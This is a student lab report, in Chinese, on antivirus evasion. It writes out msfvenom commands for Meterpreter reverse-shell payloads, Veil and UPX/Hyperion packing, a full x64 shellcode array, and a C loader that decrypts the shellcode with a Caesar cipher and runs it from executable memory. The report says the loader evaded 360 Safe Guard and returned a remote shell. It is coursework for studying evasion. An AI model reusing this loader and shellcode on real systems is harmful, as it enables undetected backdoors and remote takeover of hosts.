20222327 2024-2025-1 《网络与系统攻防技术》实验三实验报告

一、实验内容

1.正确使用msf编码器，veil-evasion，自己利用shellcode编程等免杀工具或技巧

2.通过组合应用各种技术实现恶意代码免杀

3.用另一电脑实测，在杀软开启的情况下，可运行并回连成功，注明电脑的杀软名称与版本

4.问题回答

（1）杀软是如何检测出恶意代码的？

基于特征码检测：杀毒软件中存在一个储存特征码的库，这些特征码是恶意代码的唯一标识，由一段或多段数据组成。杀毒软件会将要检测的程序与特征码库中的数据进行比对，如果匹配成功，则判定为恶意代码。
启发式恶意软件检测：如果某个软件的行为或特征与恶意软件相似，达到一定程度，则判定为恶意代码。这种方法的优点是具有一定的通用性，可以检测0-day恶意软件，但缺点是精确度较低，可能存在误报。
基于行为的恶意软件检测：这种方法对运行的所有进程进行实时监控，如果发现敏感行为，则判定为恶意程序。这是一种动态的监测与捕捉方法，相当于加入了行为监控的启发式检测。

（2）免杀是做什么？

免杀是一种能使病毒木马免于被杀毒软件查杀的技术。由于免杀技术涉及反汇编、逆向工程、系统漏洞等技术，所以难度很高。

（3）免杀的基本方法有哪些？

改变特征码：
加壳：对可执行文件进行加壳处理，以改变其外部特征和内部结构，从而躲避杀毒软件的检测。
编码：使用编码器对恶意代码进行编码，改变其特征码，使其难以被杀毒软件识别。
重写：如果有源代码，可以使用其他语言进行重新编写，从而改变特征码。
改变行为：
通讯方式：尽量使用反弹式连接、隧道技术、加密通讯数据等方式，以隐藏恶意代码的通讯行为和特征。
操作模式：基于内存操作，减少对系统的修改，加入混淆作用的正常功能代码等，以干扰杀毒软件的检测。
非常规方法：如使用有漏洞的应用作为后门、编写攻击代码、诱骗目标关闭杀毒软件等。

二、实验过程

任务一正确使用msf编码器，veil-evasion，自己利用shellcode编程等免杀工具或技巧

1. 使用msf编辑器生成文件。

查看msfvenom支持的输出格式

输入msfvenom -p windows/meterpreter/reverse_tcp LHOST=192.168.43.200 LPORT=9000 -f exe > 20222327cy.exe，生成payload；

-p windows/meterpreter/reverse_tcp:指定了要生成的 payload 类型，是一个 Meterpreter 反向 TCP 连接；

LHOST=192.168.43.200设置了连接的 IP 地址（虚拟机的 IP 地址）；

LPORT=9000设置了连接回的本地端口号，这里为学号后四位；

-f exe: 这指定了输出格式为 Windows 可执行文件；

使用编码器对payload进行编码，输入msfvenom -p windows/meterpreter/reverse_tcp -e x86/shikata_ga_nai -b '\x00' LHOST=192.168.3.174 LPORT=2301 -f exe > 20222301cc-2.exe；

-e x86/shikata_ga_nai: 这指定了要使用的编码器；

-b ‘\x00’: 这指定了需要避免的坏字符集；

LHOST、LPORT同上；

多次编码：msfvenom -p windows/meterpreter/reverse_tcp -e x86/shikata_ga_nai -i 10 -b '\x00' LHOST=192.168.43.200 LPORT=9000 -f exe > 20222327cy_2.exe，-i 10表示编码10次；

选择一个适用于Java环境的payload来生成jar文件：msfvenom -p java/meterpreter/reverse_tcp LHOST=192.168.43.200 LPORT=9000 -f jar > 20222327cy_3.jar；

使用编码器对payload进行编码：msfvenom -p java/meterpreter/reverse_tcp LHOST=192.168.43.200 LPORT=9000 -e x86/shikata_ga_nai -i 10 -f jar > 20222327cy_4.jar；

生成一个反向 TCP 连接的 Linux elf 可执行文件：msfvenom -p linux/x86/meterpreter/reverse_tcp LHOST=192.168.43.200 LPORT=9000 -f elf > 20222327cy_5.elf

使用编码器对payload进行编码：msfvenom -p linux/x86/meterpreter/reverse_tcp LHOST=192.168.43.200 LPORT=9000 -e x86/shikata_ga_nai -i 10 -f elf > 20222327cy_6.elf

将生成的20222327.exe等多个文件放到共享文件夹中传到主机上；

使用VirusTotal进行检测

20222327cy.exe

20222327cy_1.exe

20222327cy_2.exe

20222327cy_4.jar

20222327cy_6.elf

2．使用veil加壳

mkdir -p ~/.cache/wine

cd ~/.cache/wine

wget http://dl.winehq.org/wine/wine-gecko/2.47/wine_gecko-2.47-x86.msi

wget http://dl.winehq.org/wine/wine-gecko/2.47/wine_gecko-2.47-x86_64.msi

sudo apt-get install libncurses5*

sudo apt-get install libavutil55*

sudo apt-get install gcc-mingw-w64*

sudo apt-get install wine32

再依次输入如下代码进行安装veil

apt-get install veil
sudo su
cd /usr/share/veil/config/
vim setup.sh
在文件的第260行将下载地址改为https://gitee.com/spears/VeilDependencies.git后，ESC键退出，:wq退出

输入veil进行安装，所有软件进行默认安装
在安装时遇到如下报错时，输入sudo /usr/share/veil/config/setup.sh --force --silent即可解决

完成安装之后进入veil

输入use evasion ，进入Evil—Evasion

输入命令list，查看能用的payload类型

因为要使用第七个c/meterpretermrev_tcp.py，所以输入命令use 7

先查看一下虚拟机的IP地址，防止发生改变

可知虚拟机地址是192.168.60.130
之后依次输入
set LHOST 192.168.60.130
set LPORT 9000
generate
生成文件20222327veil

进入文件夹/var/lib/veil/output/compiled/后查看可执行文件

对生成的文件进行检测

3.使用C + shellcode编程

输入msfvenom -p windows/meterpreter/reverse_tcp LHOST=192.168.60.130 LPORT=9000 -f c

编写文件20222327.c

将生成的buf[]数组放入文件中

将C语言文件编译为可执行文件20222327.exe


将文件传到主机上进行检测


使用upx进行加壳upx 20222327.exe -o upx20222327.exe

进入文件夹 /usr/share/windows-resources/hyperion

使用hyperion加壳wine hyperion.exe -v upx20222327.exe hyperion20222327.exe

将所有生成的文件传输到本机进行检测


upx20222327.exe

hyperion20222327.exe

任务二通过组合应用各种技术实现恶意代码免杀

组合技术：msfvenom生成Shellcode数组，再使用凯撒加密对数组进行加密，将加密后的密文放入txt文件中，再编写C语言代码，从txt文件中读取密文，解密并运行Shellcode，最后生成.exe可执行文件。
kali虚拟机中通过msfvenom生成Shellcode数组，代码如下msfvenom -p windows/x64/meterpreter/reverse_tcp LHOST=192.168.60.130 LPORT=9000 -f c

在VScode中新建20222327_jiami.cpp文件，输入代码，代码功能为将复制内容放入shellcode1[]数组中，通过代码将shellcode1进行凯撒加密，将密文输入到2327jiami.txt文件中；
在同文件夹下新建空文件2327jiami.txt，用以存放密文
代码如下：

 #include <stdio.h>

 #include<string.h>

 //凯撒加密函数，适用于unsigned char数组

 void caesarEncrypt(unsigned char *data, size_t length, int shift) {

 for (size_t i = 0; i < length; i++) {

 // 对每个字节进行位移

 data[i]= (data[i] + shift) & 0xFF;

   }

}

int main( ) {

unsigned char shellcode1[] = 
"\xfc\x48\x83\xe4\xf0\xe8\xcc\x00\x00\x00\x41\x51\x41\x50"
"\x52\x51\x48\x31\xd2\x65\x48\x8b\x52\x60\x48\x8b\x52\x18"
"\x48\x8b\x52\x20\x56\x4d\x31\xc9\x48\x0f\xb7\x4a\x4a\x48"
"\x8b\x72\x50\x48\x31\xc0\xac\x3c\x61\x7c\x02\x2c\x20\x41"
"\xc1\xc9\x0d\x41\x01\xc1\xe2\xed\x52\x48\x8b\x52\x20\x8b"
"\x42\x3c\x41\x51\x48\x01\xd0\x66\x81\x78\x18\x0b\x02\x0f"
"\x85\x72\x00\x00\x00\x8b\x80\x88\x00\x00\x00\x48\x85\xc0"
"\x74\x67\x48\x01\xd0\x8b\x48\x18\x44\x8b\x40\x20\x49\x01"
"\xd0\x50\xe3\x56\x4d\x31\xc9\x48\xff\xc9\x41\x8b\x34\x88"
"\x48\x01\xd6\x48\x31\xc0\xac\x41\xc1\xc9\x0d\x41\x01\xc1"
"\x38\xe0\x75\xf1\x4c\x03\x4c\x24\x08\x45\x39\xd1\x75\xd8"
"\x58\x44\x8b\x40\x24\x49\x01\xd0\x66\x41\x8b\x0c\x48\x44"
"\x8b\x40\x1c\x49\x01\xd0\x41\x8b\x04\x88\x48\x01\xd0\x41"
"\x58\x41\x58\x5e\x59\x5a\x41\x58\x41\x59\x41\x5a\x48\x83"
"\xec\x20\x41\x52\xff\xe0\x58\x41\x59\x5a\x48\x8b\x12\xe9"
"\x4b\xff\xff\xff\x5d\x49\xbe\x77\x73\x32\x5f\x33\x32\x00"
"\x00\x41\x56\x49\x89\xe6\x48\x81\xec\xa0\x01\x00\x00\x49"
"\x89\xe5\x49\xbc\x02\x00\x23\x28\xc0\xa8\x3c\x82\x41\x54"
"\x49\x89\xe4\x4c\x89\xf1\x41\xba\x4c\x77\x26\x07\xff\xd5"
"\x4c\x89\xea\x68\x01\x01\x00\x00\x59\x41\xba\x29\x80\x6b"
"\x00\xff\xd5\x6a\x0a\x41\x5e\x50\x50\x4d\x31\xc9\x4d\x31"
"\xc0\x48\xff\xc0\x48\x89\xc2\x48\xff\xc0\x48\x89\xc1\x41"
"\xba\xea\x0f\xdf\xe0\xff\xd5\x48\x89\xc7\x6a\x10\x41\x58"
"\x4c\x89\xe2\x48\x89\xf9\x41\xba\x99\xa5\x74\x61\xff\xd5"
"\x85\xc0\x74\x0a\x49\xff\xce\x75\xe5\xe8\x93\x00\x00\x00"
"\x48\x83\xec\x10\x48\x89\xe2\x4d\x31\xc9\x6a\x04\x41\x58"
"\x48\x89\xf9\x41\xba\x02\xd9\xc8\x5f\xff\xd5\x83\xf8\x00"
"\x7e\x55\x48\x83\xc4\x20\x5e\x89\xf6\x6a\x40\x41\x59\x68"
"\x00\x10\x00\x00\x41\x58\x48\x89\xf2\x48\x31\xc9\x41\xba"
"\x58\xa4\x53\xe5\xff\xd5\x48\x89\xc3\x49\x89\xc7\x4d\x31"
"\xc9\x49\x89\xf0\x48\x89\xda\x48\x89\xf9\x41\xba\x02\xd9"
"\xc8\x5f\xff\xd5\x83\xf8\x00\x7d\x28\x58\x41\x57\x59\x68"
"\x00\x40\x00\x00\x41\x58\x6a\x00\x5a\x41\xba\x0b\x2f\x0f"
"\x30\xff\xd5\x57\x59\x41\xba\x75\x6e\x4d\x61\xff\xd5\x49"
"\xff\xce\xe9\x3c\xff\xff\xff\x48\x01\xc3\x48\x29\xc6\x48"
"\x85\xf6\x75\xb4\x41\xff\xe7\x58\x6a\x00\x59\x49\xc7\xc2"
"\xf0\xb5\xa2\x56\xff\xd5";

  int shift =3; // 加密位移

  printf("original: ");

  for (size_t i = 0; i < 510; i++) {

  printf("\\x%02x",shellcode1[i]);

 }

 printf("\n");

 caesarEncrypt(shellcode1,510,shift);

 printf("Encrypted:");

 for (size_t i =0;i< 510; i++){

 printf("\\x%02x",shellcode1[i]);

          }

 printf("\n");
 FILE *file = fopen("2327jiami.txt", "w");

if (file != NULL) {

    for (size_t i = 0; i < 510; i++) {

        fprintf(file, "\\x%02x", shellcode1[i]);

    }

    fprintf(file, "\n");

    fclose(file);

} else {

    printf("Error opening file!\n");

}

 return 0;

  }

编辑并运行该文件,同时新建20222327_jiemi.cpp文件，输入代码，代码功能为读取2327jiami.txt文件中的内容到shellcode1[]数组中，并进行解密，再运行shellcode
代码如下：

#include <windows.h>
#include <stdio.h>
#include <stdlib.h>
#include <string.h>
// 凯撒解密函数，适用于unsigned char数组

void caesarDecrypt(unsigned char *data, size_t length, int shift) {

  for (size_t i = 0; i < length; i++) {

    // 对每个字节进行位移

    data[i] = (unsigned char)((data[i] - shift + 256) % 256);

    }

}


int main() {

int shift = 3; // 凯撒加密的位移值
unsigned char shellcode1[511]; // 假设文件中的内容不超过510字节
char line[1024]; // 用于读取文件的临时缓冲区
// 打开文件

FILE *file = fopen("2327jiami.txt", "r");
if (file == NULL) {
    perror("Error opening file");
    return 1;
}
// 读取文件内容到shellcode1数组中
size_t length = 0;
while (fgets(line, sizeof(line), file)) {
    // 将读取的十六进制字符串转换为字节并存储在shellcode1中
    for (size_t i = 0; line[i] != '\0' && line[i] != '\n'; i += 1) {
        if (sscanf(&line[i], "\\x%02hhx", &shellcode1[length]) == 1) {
            length++;
        }
    }
}

fclose(file);
// 解密shellcode

caesarDecrypt(shellcode1, length, shift);

// 输出解密后的shellcode

printf("Decrypted Shellcode:\n");

for (size_t i = 0; i < 510; i++) {

    printf("\\x%02x", shellcode1[i]);

}

printf("\n");



// 分配内存并设置为可执行

LPVOID exec = VirtualAlloc(0, sizeof shellcode1, MEM_COMMIT, PAGE_EXECUTE_READWRITE);



// 将解密后的shellcode复制到分配的内存中

memcpy(exec, shellcode1, sizeof shellcode1);

// 执行shellcode

((void(*)())exec)();



return 0;
  }

文件位置如图

杀软没有检测到程序

在虚拟机中使用msfconsole指令进入msf控制台，对msf控制台进行配置
依次输入
use exploit/multi/handler
set payload windows/x64/meterpreter/reverse_tcp
set LHOST 192.168.60.130
set LPORT 9000

双击运行20222327_jiemi.exe，返回到kali，发现获得了Windows主机的连接，得到了远程控制的shell，可执行相关命令，如ls

说明回连并攻击成功
我使用的电脑的杀软是360安全卫士
版本:14.0.1.1009

三、问题及解决方案

• 问题1：无法安装veil
• 问题1解决方案：在前几个步骤成功完成下，到了安装veil时发现尽管我已近按照安装步骤一步一步的安装了veil，但是当我再次输入veil命令时还是弹出了让我继续安装veil的指令，再经过数十次反复摸索之后（包括考虑空间不够、一些软件如python、wine等无法安装并自行手动安装），按照其他同学的经验来说，只剩下了再重新安装一台虚拟机，尝试在新的机器中能否正常安装veil，幸运的是，在新的虚拟机中我成功安装了veil并完成了后续步骤，但是我仍然找不出为什么在原来的机器上无法安装veil，这也是为什么在任务一中我的虚拟机IP地址是192.168.43.200，而在后面的任务中IP地址变成了192.168.60.130.

4.学习感悟、思考等

在实验过程中，我首先接触并使用了msf编码器。通过msfvenom，生成了包括jar文件在内的多种类型文件。在这个过程中，我了解到编码器的作用是通过改变恶意代码的特征码，使其难以被杀毒软件识别。同时，我也发现，单一的编码操作并不能完全实现免杀，需要多次迭代或结合其他技术才能提高免杀的成功率。
接下来，我了解了veil-evasion工具的使用。veil是一个强大的免杀框架，它提供了多种免杀技巧和方法。通过veil，我学习了如何对恶意代码进行加壳处理，以及如何利用shellcode编程生成免杀的后门程序。这些技术让我对免杀有了一些直观的理解。但是veil安装过程真的很折磨人(T＿T)